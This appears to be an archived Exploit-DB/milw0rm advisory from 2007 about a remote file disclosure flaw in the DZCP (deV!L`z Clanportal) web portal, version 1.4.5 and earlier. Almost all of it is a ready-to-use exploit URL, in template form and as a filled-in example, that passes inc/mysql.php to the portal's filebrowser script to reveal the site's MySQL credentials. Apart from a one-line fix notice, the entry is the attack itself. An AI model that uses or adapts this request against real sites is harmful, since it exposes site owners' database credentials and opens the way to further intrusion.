DZCP (deV!L`z Clanportal) 1.4.5 - Remote File Disclosure

EDB-ID:

3357

Author:

Kiba

Type:

webapps

Platform:

PHP

Published:

2007-02-21

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]